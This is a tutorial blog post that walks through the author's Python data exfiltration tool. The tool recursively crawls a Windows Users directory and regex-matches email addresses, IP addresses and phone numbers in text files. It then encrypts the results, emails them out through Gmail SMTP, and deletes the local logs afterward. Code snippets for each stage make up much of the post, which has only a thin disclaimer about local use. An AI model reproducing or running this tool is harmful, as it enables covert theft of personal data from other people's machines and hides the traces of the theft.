Building a Python data exfiltration tool
This tutorial explains how I created a hard drive crawler and extraction tool. This Python data exfiltration tool uses regex for matching desired data patterns while scanning through specified file extensions.
Similar to my Advanced Keylogger project, I designed this to be used on the local host to prevent nefarious use. Unethical use of this program is strictly prohibited, though it demonstrates the necessity of secure encrypted storage for sensitive information.
Storing sensitive information on an external hard drive (preferably encrypted) is the best method of secure private storage.
Anything connected to a network always has the potential to be accessed from remote nefarious sources.
With that said, let’s get started!
Getting started with the data exfiltration tool
First off, make sure you get my code at https://github.com/ngimb64/HardDrive-Crawler, and make sure to read the instructions thoroughly.
The program starts at line 113 of the harddriveCrawler.py file, where the main function is called inside a try-except statement. The purpose of this is to run the main function unless a keyboard interrupt is detected or an error occurs, which results in logging the error and proceeding.
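A minimal sketch of that entry point (the structure mirrors the description above; the handler bodies here are illustrative, not the repo's exact code):

```python
import logging
import sys

def main():
    # Crawl the drive, encrypt the findings, and email them (covered below)
    pass

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print('* Ctrl-C detected ... exiting *')
        sys.exit(0)
    except Exception as ex:
        # Log the error instead of crashing silently
        logging.basicConfig(level=logging.DEBUG, filename='error_log.txt')
        logging.exception('* Error Occurred: {} *'.format(ex))
```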
Now, let’s take a closer look at the main section of the code.
Recursive hard drive crawler
The crawler begins at line 11, starting up the timer from the time module for testing the program’s execution speed.
from time import time
...

def main():
    start = time()
    ...
Then it creates a directory in the specified path, sets that path as a variable, and assigns the compiled regex patterns to variables.
import pathlib
import re

pathlib.Path('C:/Tmp').mkdir(parents=True, exist_ok=True)
path = 'C:\\Tmp\\'
re_txt = re.compile(r'.+\.txt$')
re_email = re.compile(r'^.+@(?:gmail|yahoo|hotmail|aol|msn|live|protonmail)\.com')
re_ip = re.compile(r'(?:\s|^)[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
re_phone = re.compile(r'(1?)(?:\s|^)[0-9]{3}-[0-9]{3}-[0-9]{4}')
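To see what these patterns do and do not match, here is a quick check against made-up sample strings (the samples are mine, not from the repo):

```python
import re

re_txt = re.compile(r'.+\.txt$')
re_email = re.compile(r'^.+@(?:gmail|yahoo|hotmail|aol|msn|live|protonmail)\.com')
re_ip = re.compile(r'(?:\s|^)[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')
re_phone = re.compile(r'(1?)(?:\s|^)[0-9]{3}-[0-9]{3}-[0-9]{4}')

# The extension pattern is applied to file names with match()
print(bool(re_txt.match('passwords.txt')))         # True
print(bool(re_txt.match('photo.png')))             # False

# The content patterns are applied to file contents line by line
print(bool(re_email.match('alice@gmail.com')))     # True
print(bool(re_ip.search('host at 10.0.0.5')))      # True
print(bool(re_phone.search('call 555-867-5309')))  # True
```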
Once necessary variables & logging are set, the crawling can begin!
I start by initiating a context manager which will open the log file and automatically close the file when that code block ends at line 50. Anything within the indented block of code can be written to that file.
Since different information will be logged many times, this approach is preferable to repeatedly opening and closing the file.
Now that the log file is open, it’s time to use the walk function of the os module for recursive access to the file system.
Line 22 is where os.walk is pointed at the Users directory. This is ideal considering this directory tree is where users typically store most of their data.
for dirpath, dirnames, filenames in os.walk('C:\\Users\\', topdown=True):
The for dirpath, dirnames, filenames part unpacks the tuple that os.walk yields for each directory, so any of the three values can be used inside the loop.
Here is how the crawler walks:
- Log the path of the directories (log.write('Path => {}\n'.format(dirpath)))
- Iterate through the directory names in the path and log them (for d in dirnames:)
- Iterate through the file names in the path and log them (for file in filenames:)
  - If regex matches the file extension compiled in the pattern (if re_txt.match(file):)
    - Open the file and search through it line by line
    - If regex matches one of the patterns (IP address, email, or phone number), write the match with the path and file name to a separate log
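Put together, the walk described above can be sketched roughly like this (only the IP pattern is shown for brevity; the function name and the log formats are my approximations, not the repo's exact code):

```python
import os
import re

re_txt = re.compile(r'.+\.txt$')
re_ip = re.compile(r'(?:\s|^)[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}')

def crawl(root, log_path, match_log_path):
    # One context manager keeps both logs open for the whole walk
    with open(log_path, 'a') as log, open(match_log_path, 'a') as match_log:
        for dirpath, dirnames, filenames in os.walk(root, topdown=True):
            log.write('Path => {}\n'.format(dirpath))
            for d in dirnames:
                log.write('Dir => {}\n'.format(d))
            for file in filenames:
                log.write('File => {}\n'.format(file))
                if re_txt.match(file):
                    try:
                        with open(os.path.join(dirpath, file)) as fh:
                            for line in fh:
                                if re_ip.search(line):
                                    match_log.write('{} {} => {}'.format(
                                        dirpath, file, line))
                    except OSError:
                        # Unreadable files are skipped; error handling below
                        continue
```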
You might notice lines 40-44 look similar to the global logging set up in the introduction. It is the same logging code, reused here inside the loop.
except Exception as ex:
    logging.basicConfig(level=logging.DEBUG,
                        filename='C:/Tmp/error_log.txt')
    logging.exception('* Error Occurred: {} *'.format(ex))
The crawler produces an error every time it tries to access a file that requires elevated permissions. Normally the global logging would suffice even if multiple errors are raised, but given how quickly the crawler moves through the files, it appears a threshold is hit when multiple errors occur within a few seconds of each other.
After experimenting, the solution was to add another logging try-except block within the loop to prevent the program from exiting.
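The inner handler boils down to this pattern, sketched here around the per-file read (the function name is mine, not the repo's):

```python
import logging

logging.basicConfig(level=logging.DEBUG, filename='error_log.txt')

def read_lines(file_path):
    # Return the file's lines, logging and skipping unreadable files
    # instead of letting a PermissionError stop the whole crawl
    try:
        with open(file_path) as fh:
            return fh.readlines()
    except OSError as ex:
        logging.exception('* Error Occurred: {} *'.format(ex))
        return []
```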
Encrypting the data
Considering that most email services do not store messages encrypted, I decided to encrypt the data, and to hash it before and after the process for assured integrity.
The encryption process:
- Use the os.walk procedure to access the directory that was created to store the log files
- Iterate over each of the files in the specified path:
  - Generate a SHA512 hash of the plaintext data and log it to a file
  - Read the plaintext and use a key to encrypt the data
  - Generate a SHA512 hash of the encrypted data and log it to a file
- Use a separate key to encrypt the file containing all the hash information
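Those steps can be sketched as follows. This is a minimal illustration assuming Fernet symmetric encryption from the third-party cryptography package and SHA512 from hashlib; the function and variable names are my own, not the repo's:

```python
import hashlib
from cryptography.fernet import Fernet  # assumed dependency, not stdlib

def sha512_hex(data: bytes) -> str:
    # Hex digest used for the before/after integrity check
    return hashlib.sha512(data).hexdigest()

def encrypt_file(file_path, key, hash_log):
    # Hash the plaintext, encrypt the file in place, then hash the ciphertext
    with open(file_path, 'rb') as fh:
        plain = fh.read()
    hash_log.append('{} plain => {}'.format(file_path, sha512_hex(plain)))
    cipher = Fernet(key).encrypt(plain)
    with open(file_path, 'wb') as fh:
        fh.write(cipher)
    hash_log.append('{} cipher => {}'.format(file_path, sha512_hex(cipher)))
```

The hash log itself would then be written out and encrypted with a separate key, as described above.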
Emailing the data
At this point the encrypted logged data is ready to send to the specified email account (lines 78-79).
A MIMEMultipart message is assigned to a variable, and then message fields like To, From, and Subject are set.
msg = MIMEMultipart()
msg['From'] = email_address
msg['To'] = email_address
msg['Subject'] = 'Success!!!'
Then, the same directory with the encrypted logs is iterated over again with the os.walk procedure.
If the files in the directory match the encrypted file regex pattern, they will be attached to the message.
if re_email.match(file):
    p = MIMEBase('application', 'octet-stream')
    with open(path + file, 'rb') as attachment:
        p.set_payload(attachment.read())
    encoders.encode_base64(p)
    p.add_header('Content-Disposition',
                 'attachment; filename = {}'.format(file))
    msg.attach(p)
The smtplib module then connects to the email provider on the TCP port used for transport, finally transferring the data to the email account.
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login(email_address, password)
s.sendmail(email_address, email_address, msg.as_string())
s.quit()
Cleaning up
The data exfiltration tool finishes up by shutting down the logging that was initially set and removing the created directory with all the logged contents.
There is no need to keep the data on the machine locally when it is now stored in an email account.
Finally, it reports how long the entire process took. On my system, it took around 45 seconds based on the amount of .txt data.
The overall execution time varies based on the scope of the file system that is being searched, the file extensions it matches, and how many files it matches.
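A rough sketch of that cleanup step (the path and timer follow the earlier snippets; shutil.rmtree for the directory removal is my assumption):

```python
import logging
import shutil
from time import time

def cleanup(path, start):
    # Flush handlers and shut down logging so its files can be removed
    logging.shutdown()
    # Delete the staging directory and all logged contents
    shutil.rmtree(path, ignore_errors=True)
    # Return total elapsed seconds since the timer started in main()
    return time() - start
```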
That’s about it for this program, though it could be easily turned into a general search tool using a regex library for finding specific data FAST.
Hope you enjoyed it! If you did, you’ll probably also enjoy reading about my Advanced Python Keylogger.